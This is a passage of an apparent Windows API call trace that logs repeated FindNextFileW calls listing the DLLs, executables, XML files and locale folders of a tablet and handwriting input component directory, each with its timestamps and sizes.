(in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0042.516] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0042.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0042.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0042.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0042.521] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, 